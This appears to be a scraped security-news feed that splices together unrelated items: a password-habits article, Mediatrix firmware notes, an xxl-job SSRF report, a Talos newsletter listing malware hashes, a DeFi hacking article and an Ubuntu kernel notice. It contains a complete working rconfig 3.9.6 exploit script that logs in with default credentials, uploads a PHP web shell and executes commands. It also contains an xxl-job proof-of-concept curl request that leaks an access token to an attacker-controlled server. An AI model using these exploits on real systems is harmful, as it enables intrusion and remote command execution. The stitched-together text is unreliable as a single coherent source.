By Waqas
ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date.
This is a post from HackRead.com Read the original post: Study shows that 42% of people use their names in passwords

Password theft can make life significantly more difficult. Aside from benign major hassle, compromised passwords can easily lead to identity theft and cause serious legal issues. Therefore, it is worth paying attention to the strength of your passwords and changing them regularly or, at the latest, when you suspect your accounts have been compromised.

ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date. Since this information is easily traceable on social media, your accounts can be more prone to hacking attacks.

**How can someone find out my password?**

A compromised password allows unauthorized people to log into your accounts. Password compromise is usually not your fault; your data is not directly compromised on a specific computer. There’s no reason to automatically assume that an attacker has accessed or hacked your computer and is still watching it (these thoughts are only appropriate if you find that multiple passwords have been compromised in a relatively short period of time).

The most common reason is the theft of user’s personal data from various services. It is also conceivable that attackers could hack and obtain a database of users of a certain service (a so-called “Breach”) and then publish it. The password is then sold on the black market and can in fact be read by anyone. 

**How to protect yourself****Checking for fraudulent use**

You can easily check your password online. Take a look at the publicly available tools that can do this. Most of them work automatically and can send an alert when you enter your email address if they detect a leak or incident (containing your email address or password) as mentioned above.

The best-known monitoring tool is ”have I been pwned”. Here, after entering your email address, you can see which services or providers have been hacked and which user accounts have been compromised. If your account is listed, consider your password hacked and change it urgently. It is clear which one it is by looking at your password, even if it is not naturally displayed.

You can type the password directly into the Pwned Passwords tool (instead of looking for the associated email). The result is a notification of whether the password was part of a data breach and how many times it happened. The database contains over 613 million compromised passwords that have previously been proven to have been stolen.

Other password compromise checking services:

*   F-Secure
*   Firefox Monitor
*   Chrome browser
*   Avast Hack Check
*   Mirkat for Lenovo

**Discover weak and duplicated passwords at the administrator or keychain**

Password compromise detection or password weakness alerts should be available in any decent password manager. We’ve already covered them in our magazine, and you can find the best-known ones in a dedicated password managers section.

On some systems, passwords are stored in keychains that support the features mentioned above; for example, on iOS (iPhone) and macOS, the keychain warns if a password is weak or repeated across multiple services. Since iOS 14 and macOS Big Sur, the keychain can also keep track of compromised passwords. If your saved password has an exclamation mark icon next to it, you should change it right away.

1.  List of 2020’s most used passwords is here and it’s appalling
2.  Revealed: The 200 Most used and Worst Passwords of 2021
3.  Chrome on Android will alert, fix your compromised password
4.  Psst! tool by 1Password lets users share passwords using a link
5.  Nissan source code leaked, it used “admin” as username, password

**Use a password manager**

The average internet user uses so many services and apps that if they had to use unique passwords for each one, they would not be able to remember them. So, if you don’t want to give up security completely and use a single password, we recommend using a password manager.

Password managers may even suggest strong passwords, which is something to consider. Password suggestions are also built into some browsers or password manager plug-ins allow this feature. Artificial intelligence can judge better than the user what is a suitable and strong password.

The default setting for cloud-based password managers is to log in with 2FA. If you use a password manager on your phone, it usually has biometrics – fingerprint or facial recognition. This adds another layer of security to password access.

**Ustwo-factor authentication**

We regularly cover two-factor authentication (2FA) in our magazine, so the term is certainly not new to you. Simply put, 2FA adds an extra layer of protection to your login, so a simple password is no longer enough. To log in, you will still need to enter a one-time password (OTP), which is generated separately on the device you have. This is usually an app on your smartphone that shows you an OTP password for each “paired” service, which is valid for a very short period.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Study shows that 42% of people use their names in passwords

Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port.

DGW Application 48.5.2718

*   Summary
*   Security changes

**Summary**

ID

Synopsis

DGW-14973

SIP: Support additional DHE ciphers

DGW-15007

User passwords are now securely hashed

DGW-15338

OWASP: Disable access to internal UART

DGW-15442

CVE-2022-0778: Possible Denial of Service (DoS) from purposedly crafted TLS certificate

**Security changes  
**

**DGW-15442 - CVE-2022-0778: Possible Denial of Service (DoS) from purposedly crafted TLS certificate**

An important security flaw was found in the OpenSSL library affecting DGW version 48.4 and below. If exploited successfully, this vulnerability could cause the unit to reboot unexpectedly.

The CVE-2022-0778 has been addressed by upgrading the OpenSSL library to version 1.1.1n.

**DGW-15338 - OWASP: Disable access to internal UART**

Follow OWASP IoT Verification Requirement C.1:Verify that application layer debugging interfaces such USB, UART, and other serial variants are disabled or protected by a complex password.

**DGW-15007 - User passwords are now securely hashed**

User passwords are no longer saved in clear text, but instead saved in a cryptographically secure way, using the PBKDF2-HMAC-SHA256 hash algorithm.

Previously, when exporting a backup or configuration script, the passwords could be read in clear-text. Now, only the hashed passwords are visible.

A user cannot retrieve a forgotten password anymore, since it is impossible to reverse a hashed password into a clear-text password. In case all passwords are forgotten, a partial reset or factory reset can be done to restore to the factory initial passwords.

**DGW-14973 - SIP: Support additional DHE ciphers**

The SipEp service now supports the following DHE ciphers when using SIP over TLS:

*   TLS\_DHE\_RSA\_WITH\_AES\_128\_CBC\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_128\_GCM\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_256\_CBC\_SHA256
*   TLS\_DHE\_RSA\_WITH\_AES\_256\_GCM\_SHA384

**Copyright Notice**

Copyright 2022 Media5 Corporation.

This document contains information that is proprietary to Media5 Corporation.

Media5 Corporation reserves all rights to this document as well as to the Intellectual Property of the document and the technology and know-how that it includes and represents.

This publication cannot be reproduced, neither in whole nor in part, in any form whatsoever, without written prior approval by Media5 Corporation.

Media5 Corporation reserves the right to revise this publication and make changes at any time and without the obligation to notify any person and/or entity of such revisions and/or changes.

www.media5corp.com

CVE-2022-43096: DGW Security Improvement Notes v48.5.2718 - Mediatrix

XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.

xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands

1.  Vulnerability description  
    XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.  
    There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.  
    The /logDetailCat interface call only needs to be a low Privilege user of the platform。

2.Affected version  
Xxl-job-admin =< 2.3.1 （latest）

3.Proof of concept  
1、build an http server locally and print the http request header log.  
  
2、Create a normal user normal without any executor permissions。  
  
  
3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server  
curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \ -H 'Origin: http://localhost:8080' \ -H 'Referer: http://localhost:8080/xxl-job-admin/' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "macOS"' \ --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \ --compressed   
  

4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands  

4、Recommendations  
The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.

CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job

The Snort 2023 calendar is finally here, and y’all, it’s a good one. Packed full of classic memes and punny Snorties, the calendar is sure to delight all year long.

Thursday, November 17, 2022 14:11

Welcome to this week’s edition of the Threat Source newsletter.

It's everyone’s favorite time of year again and no, I don’t mean the impending holidays. The Snort 2023 calendar is finally here, and y’all, it’s a good one. Packed full of classic memes and punny Snorties, the calendar is sure to delight all year long. The Talos creative team really knocked it out of the park with these original designs. I won’t spoil the whole calendar and reveal too much, but I’ve shared a favorite below...

Want a copy? NEED a copy? Simply fill out our short survey here. Calendars will begin shipping after December 1, 2022. U.S. shipping only, available while supplies last.

**The one big thing**

_Contributed by Chris Neal_

This week Cisco Talos has published a blog detailing new variants and versions of LodaRAT, a remote access tool and stealer written in the AutoIt scripting language. Additionally, we identified several instances where LodaRAT was deployed alongside more advanced malware, including RedLine, Neshta and a VenomRAT clone known as S500.

**Why do I care?**

These new iterations and the pairing with other malware families represent a growth phase for LodaRAT throughout 2022. Many of the variations we observed added functionality to LodaRAT, making it a more capable malware; including one notable variant that copies LodaRAT to all attached removable storage for proliferation. These changes signal that more advanced variants will likely appear in the threat landscape in the future.

**So now what?**

Cisco Talos will continue its research into LodaRAT and provide coverage for future variants. We have also provided full Snort and ClamAV coverage for all samples observed during this research. As always, Cisco Talos recommends ensuring all products are updated to the most recent version, as well as maintaining a thorough standardized security posture.

**Top security headlines of the week**

Australia takes an offensive approach after two high-profile cyber-attacks targeting Australian telecommunications company Optus and insurance provider Medibank.  Cybersecurity Minister Clare O’Neil has vowed to “hack the hackers” as the country establishes a permanent task force. O’Neil stated, “The joint standing operation will not simply respond to crimes as they affect Australians; they will be hunting these gangs around the world and disrupting the actives of these people.” (itnews)

If you’ve yet to hit it big will Mega Millions, give bug bounties a try. One lucky security researcher found an “accidental” security bug but came away $70,000 richer. Privately reported, the bug allowed anyone to unlock Google Pixel phones without knowing the passcode. Tracked as CVE-2022-20465, the bypass allows for users to access the devices data without ever having to enter the passcode through the lock screen. (TechCrunch)

Consistent with cybersecurity trends this year, Education continues to be a top target of ransomware. The education space creates an ideal context for high impact lures with time pressure built in, like back-to-school time and student loan deadlines and information. “Impacts have ranged from restricted access to the network, delayed exams, canceled school days, to unauthorized access to personal information regarding students and staff,” Jen Easterly, director of Cybersecurity and Infrastructure Security Agency, shared during the CISA national summit on k-12 school safety and security. Just prior to the summit, The Center for Internet Security released a report citing sector-wide cyber maturity concerns with 81% of schools not implementing multi-factor authentication. However, 83% of schools hold cyber insurance, a topic Talos’ own Martin Lee just wrote on. (SC Media)

**Can’t get enough Talos?**

*   Vulnerability Spotlight: Microsoft Office class attribute double-free vulnerability
*   Ransomware: Why do businesses still pay up?
*   Cyber insurance: The good, the bad and the ugly

**Upcoming events where you can find Talos**

SIS(Security Intelligence Summit), 2022.ON (Nov. 29)  
Josun Palace, Seoul

AVAR (Association of Anti-Virus Asia Researchers), 2022.ON (Dec. 1-2)  
Carlton Hotel, Singapore

CactusCon (Jan 27-28)  
Mesa, AZ

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
VirusTotal: https://www.virustotal.com/gui/file/1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d/details  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Worm.Generic.914973

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
VirusTotal: https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details  
Typical Filename: Wextract  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256: 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
VirusTotal: https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details  
Typical Filename: LwssPlayer  
Claimed Product: N/A  
Detection Name: Auto.125E12.241442.in02

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
MD5: d47fa115154927113b05bd3c8a308201  
VirusTotal: https://www.virustotal.com/gui/file/00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
Typical Filename: outlook.exeClaimed  
Claimed Product: MS OutlookDetection  
Detection Name: W32.00AB15B194-95.SBX.TG

Threat Source newsletter (Nov. 17, 2022): Hot off the press! The Snort 2023 Calendar is here

An arbitrary file upload vulnerability in rconfig v3.9.6 allows attackers to execute arbitrary code via a crafted PHP file.

**rconfig 3.9.6 - Arbitrary File Upload**

**Platform:****PHP**

**Date:****2021-04-21**

  

    # Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
    # Exploit Author: Vishwaraj Bhattrai
    # Date: 18/04/2021
    # Vendor Homepage: https://www.rconfig.com/
    # Software Link: https://www.rconfig.com/
    # Vendor: rConfig
    # Version: <= v3.9.6
    # Tested against Server Host: Linux+XAMPP
    
    import requests
    import sys
    s = requests.Session()
    
    host=sys.argv[1] #Enter the hostname
    cmd=sys.argv[2]  #Enter the command
    
    def exec_cmd(cmd,host):
        print "[+]Executing command"
        path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
        response=requests.get(path)
        print response.text
        print "\n[+]You can access shell via below path"
        print path
    
    def file_upload(cmd,host):
        print "[+]Bypassing file upload"
        burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
        burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
        burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
        requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
        exec_cmd(cmd,host)
    
    
    def login(host,cmd):
        print "[+]Logging in"
        burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
        
        burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
        response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
        file_upload(cmd,host)
    
    login(host,cmd)

CVE-2022-44384: Offensive Security’s Exploit Database Archive

By Waqas
The smart contracts that govern DeFi are littered with exploitable code, and hackers understand that since hundreds of millions of crypto funds have been siphoned off due to this very issue.
This is a post from HackRead.com Read the original post: We Need Smarter Smart Contracts To Prevent DeFi Hacks

Decentralized finance (DeFi) aims to disrupt the traditional financial world with its promise of greater inclusiveness and faster, anonymous transactions, but to do that it will need to overcome a significant challenge. The smart contracts that govern DeFi are littered with exploitable code that has resulted in millions of dollars of user funds being lost. 

Back in August 2021, Liquid Global, a leading Japanese cryptocurrency exchange, suffered a hack that resulted in more than $97 million worth of crypto being stolen. It was later discovered that hackers had targeted the exchange’s multi-party computation wallets, siphoning the funds within them to four external wallets. The hackers made off with around 107 Bitcoin, 9 million TRON, 11 million XRP, and almost $600 million worth of Ethereum. 

Just one day later, the DeFi industry experienced its largest-ever hack when an attacker made off with a staggering $612 million worth of crypto from the Poly Network protocol. Luckily, the hacker Mr. White Hat returned the funds soon after, saying he was an ethical hacker that just wanted to highlight the vulnerability within the protocol’s smart contract code. It was in any case an extremely close shave, as a less ethical hacker could have easily stumbled across the exploit and made off with a similar amount. 

Later that month, yet another attack targeted the crowdfunding platform, DAO Maker. Once again, smart contract code was exploited by an attacker to gain more than $7 million worth of user’s funds. It meant that hackers stole a combined $716 million worth of crypto that month alone. 

In December of the same year, hackers stole $30 million from the MonoX DEX platform after hackers exploited vulnerabilities in its smart contract.

Fast-forward to this year and the hacks have kept on coming. The biggest so far in 2022 was the attack on Ronin, a cross-chain bridge used by the popular NFT game Axie Infinity. The hackers found a critical vulnerability in Ronin’s code and stole an incredible 1730,000 ETH and over $25 million worth of USDC, for a total gain of $552 million.

That attack came barely a month after another bridge, Wormhole, suffered an attack that lost more than $300 million. Then, in April, the DeFi protocol Beanstalk fell victim to a $182 million hack that took advantage of the 24-hour execution delay in its flash loan smart contract.

**Smart Contracts Are Vulnerable**

With more than $40 billion worth of cryptocurrency locked into the DeFi ecosystem at the time of writing, it seems clear that the industry is here to stay, despite the risks it runs. However, with the top four DeFi protocols – namely Oasis, Lido, Uniswap V2, and Aave – all currently home to more than $4 billion worth of user assets, the worrying spate of high-profile hacks poses a major threat to the industry that could derail its ambition of emerging as a viable alternative to traditional financial services. 

Although some hack attacks are due to lax security measures and phishing attempts on users’ personal keys, the truth is that the majority of funds stolen in the DeFi industry are due to one thing – vulnerabilities in the smart contracts that power the industry. The vulnerabilities might be due to a coding error or external price manipulation or something else, but the end result is always the same – millions of dollars in value lost, and despair for the victims. 

Smart contracts are the self-executing code that underpins DeFi. They run on decentralized blockchain networks and play the role of automating transactions, thereby doing away with the need for a middleman (bank). They allow agreements between anonymous parties to be carried out immediately once certain conditions are met, speeding up transactions and eliminating costly fees. 

But as important as smart contracts are, they’re also littered with vulnerabilities that hackers are only too keen to exploit. That’s not a surprise given some of the amounts they have made off with. DeFi is a tempting target and will continue to be one so long as the vulnerabilities persist.

**How The Industry Has Responded**

The good news is that the DeFi industry is working hard to solve this potentially fatal problem. One way it’s doing so is by maintaining best practices for developers. After all, Solidity, which is the programming language used to create smart contracts on Ethereum, is still new and experimental, so developers can benefit from a helping hand. 

Consensys, an Ethereum software developer, has created a list of best practices that are available on its GitHub page. It provides recommendations for Solidity developers, along with examples of common smart contract hacks. It also provides software that developers can use to try and identify vulnerabilities themselves. Another company, 101 Blockchains, has created an extensive list of blockchain principles and advice around risk mitigation that developers can use to tie up loose ends in their code. 

The proliferation of smart contract hacks has also led to the rise of a new industry around blockchain security. Companies such as Kaspersky offer blockchain security assessments and network penetration testing, while its Endpoint Protection product can secure entire systems at the device level. Meanwhile, the data security firm Cocoon Data’s Safeshare offering relies on patented technology to ensure file security and prevent breaches. 

Also doing good business are the smart contract auditing firms like CertiK, which analyze application codebases for vulnerabilities before they are launched. These extensive audits determine how the code functions, identify bugs, and provide feedback for developers to fix any holes that might be identified. 

In the case of CertiK, it uses specialized software called Skynet Scanning Technologies to review smart contract codes. Meanwhile, Slowmist offers an integrated data system called Blockchain Threat Intelligence, and Quantstamp has created a decentralized smart contract audit protocol that any developer can use to check their code against validator nodes. 

**Rethinking Smart Contracts**

Not everyone is throwing in the towel though. A company called Radix, which defines itself as an asset-oriented smart contract purpose-built for DeFi, is instead aiming to reinvent how smart contacts work, in order to minimize the risk of vulnerabilities creeping into code. 

To do this, Radix has come up with an alternative DeFi infrastructure that doesn’t rely on Solidity and Ethereum Virtual Machine, but rather an entirely new architecture it calls Radix Engine. Notably, it relies on the concept of finite-state machines. Radix’s use of FSMs has resulted in an entirely new developer paradigm compared to Turing complete smart contracts. With it, the opportunities for hackers can be dramatically reduced. 

Rather than using traditional smart contracts, Radix developers instead build their DeFi apps using “components”, which are bits of code that define what their decentralized applications (dApps) can do with “actions”.

In turn, this makes dApps easier to design and analyze, and ensures their behavior is more predictable. The components can be thought of as Lego building bricks – developers can customize them, and link them together with additional components to create the smart contract functionality that powers their dApps.

Because the components are heavily scrutinized by the community and then reused time and again, they’re far more secure than traditional smart contracts that are written from scratch with each and every dApp that’s created. 

Radix dApps built using components can be likened to cogs in a machine. Assuming all of the cogs work as expected, the transaction will be successful. However, if one of the cogs (components) fails, the entire transaction will be aborted, ensuring the user’s funds remain safe in their wallets. 

**A Smarter Future**

The rising popularity of cryptocurrency means that funds will inevitably continue to pour into the DeFi space in the coming years. As such, developers cannot ignore the dangers of smart contract vulnerabilities, meaning they cannot persist with the unreliable development paradigms of the past. 

The good news is that projects like Radix prove that there are ways to bring greater security to DeFi and ensure proper safeguards for users. It remains to be seen if Radix-based DeFi will take off in the long term, but the fact it is getting traction tells us that developers understand they need to be more stringent as they create their smart contract code.

In conclusion, the industry is slowly waking up to the realization that smart contract code must become smarter if the threat of hack attacks is to subside. 

1.  The Lessons to Learn from Nomad Crypto Hack
2.  Meet Blokhaus’s New Open-Source NFT Tool Minterpress
3.  Why general population has to be educated on cryptocurrency
4.  US seizes $1.4 billion in Bitcoin from Silk Road Market Scammer
5.  DeFi Startup AllianceBlock’s Trustless ID Verification Service For Dapps

We Need Smarter Smart Contracts To Prevent DeFi Hacks

Ubuntu Security Notice 5728-1 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the memory address space accounting implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5728-1November 17, 2022linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4,linux-bluefield, linux-gcp, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systemsDetails:Jann Horn discovered that the Linux kernel did not properly track memoryallocations for anonymous VMA mappings in some situations, leading topotential data structure reuse. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2022-42703)It was discovered that a race condition existed in the memory address spaceaccounting implementation in the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2022-41222)It was discovered that a race condition existed in the instruction emulatorof the Linux kernel on Arm 64-bit systems. A local attacker could use thisto cause a denial of service (system crash). (CVE-2022-20422)It was discovered that the KVM implementation in the Linux kernel did notproperly handle virtual CPUs without APICs in certain situations. A localattacker could possibly use this to cause a denial of service (host systemcrash). (CVE-2022-2153)Hao Sun and Jiacheng Xu discovered that the NILFS file systemimplementation in the Linux kernel contained a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2022-2978)Johannes Wikner and Kaveh Razavi discovered that for some Intel x86-64processors, the Linux kernel's protections against speculative branchtarget injection attacks were insufficient in some circumstances. A localattacker could possibly use this to expose sensitive information.(CVE-2022-29901)Abhishek Shah discovered a race condition in the PF_KEYv2 implementation inthe Linux kernel. A local attacker could use this to cause a denial ofservice (system crash) or possibly expose sensitive information (kernelmemory). (CVE-2022-3028)It was discovered that the Netlink device interface implementation in theLinux kernel did not properly handle certain error conditions, leading to ause-after-free vulnerability with some network device drivers. A localattacker with admin access to the network device could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2022-3625)It was discovered that the IDT 77252 ATM PCI device driver in the Linuxkernel did not properly remove any pending timers during device exit,resulting in a use-after-free vulnerability. A local attacker couldpossibly use this to cause a denial of service (system crash) or executearbitrary code. (CVE-2022-3635)Jann Horn discovered a race condition existed in the Linux kernel whenunmapping VMAs in certain situations, resulting in possible use-after-freevulnerabilities. A local attacker could possibly use this to cause a denialof service (system crash) or execute arbitrary code. (CVE-2022-39188)Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EXstorage controller driver in the Linux kernel did not properly handlecertain structures. A local attacker could potentially use this to exposesensitive information (kernel memory). (CVE-2022-40768)Sönke Huster discovered that a use-after-free vulnerability existed in theWiFi driver stack in the Linux kernel. A physically proximate attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2022-42719)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  linux-image-5.4.0-1037-ibm      5.4.0-1037.42  linux-image-5.4.0-1050-bluefield  5.4.0-1050.56  linux-image-5.4.0-1074-raspi    5.4.0-1074.85  linux-image-5.4.0-1079-kvm      5.4.0-1079.85  linux-image-5.4.0-1087-oracle   5.4.0-1087.96  linux-image-5.4.0-1089-aws      5.4.0-1089.97  linux-image-5.4.0-1093-gcp      5.4.0-1093.102  linux-image-5.4.0-1095-azure    5.4.0-1095.101  linux-image-5.4.0-132-generic   5.4.0-132.148  linux-image-5.4.0-132-generic-lpae  5.4.0-132.148  linux-image-5.4.0-132-lowlatency  5.4.0-132.148  linux-image-aws-lts-20.04       5.4.0.1089.88  linux-image-azure-lts-20.04     5.4.0.1095.91  linux-image-bluefield           5.4.0.1050.48  linux-image-gcp-lts-20.04       5.4.0.1093.97  linux-image-generic             5.4.0.132.132  linux-image-generic-lpae        5.4.0.132.132  linux-image-ibm                 5.4.0.1037.65  linux-image-ibm-lts-20.04       5.4.0.1037.65  linux-image-kvm                 5.4.0.1079.75  linux-image-lowlatency          5.4.0.132.132  linux-image-oem                 5.4.0.132.132  linux-image-oem-osp1            5.4.0.132.132  linux-image-oracle-lts-20.04    5.4.0.1087.83  linux-image-raspi               5.4.0.1074.106  linux-image-raspi2              5.4.0.1074.106  linux-image-virtual             5.4.0.132.132Ubuntu 18.04 LTS:  linux-image-5.4.0-1037-ibm      5.4.0-1037.42~18.04.1  linux-image-5.4.0-1087-oracle   5.4.0-1087.96~18.04.1  linux-image-5.4.0-1089-aws      5.4.0-1089.97~18.04.1  linux-image-5.4.0-1095-azure    5.4.0-1095.101~18.04.1  linux-image-5.4.0-132-generic   5.4.0-132.148~18.04.1  linux-image-5.4.0-132-generic-lpae  5.4.0-132.148~18.04.1  linux-image-5.4.0-132-lowlatency  5.4.0-132.148~18.04.1  linux-image-aws                 5.4.0.1089.68  linux-image-azure               5.4.0.1095.71  linux-image-generic-hwe-18.04   5.4.0.132.148~18.04.109  linux-image-generic-lpae-hwe-18.04  5.4.0.132.148~18.04.109  linux-image-ibm                 5.4.0.1037.50  linux-image-lowlatency-hwe-18.04  5.4.0.132.148~18.04.109  linux-image-oem                 5.4.0.132.148~18.04.109  linux-image-oem-osp1            5.4.0.132.148~18.04.109  linux-image-oracle              5.4.0.1087.96~18.04.63  linux-image-snapdragon-hwe-18.04  5.4.0.132.148~18.04.109  linux-image-virtual-hwe-18.04   5.4.0.132.148~18.04.109After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-5728-1  CVE-2022-20422, CVE-2022-2153, CVE-2022-2978, CVE-2022-29901,  CVE-2022-3028, CVE-2022-3625, CVE-2022-3635, CVE-2022-39188,  CVE-2022-40768, CVE-2022-41222, CVE-2022-42703, 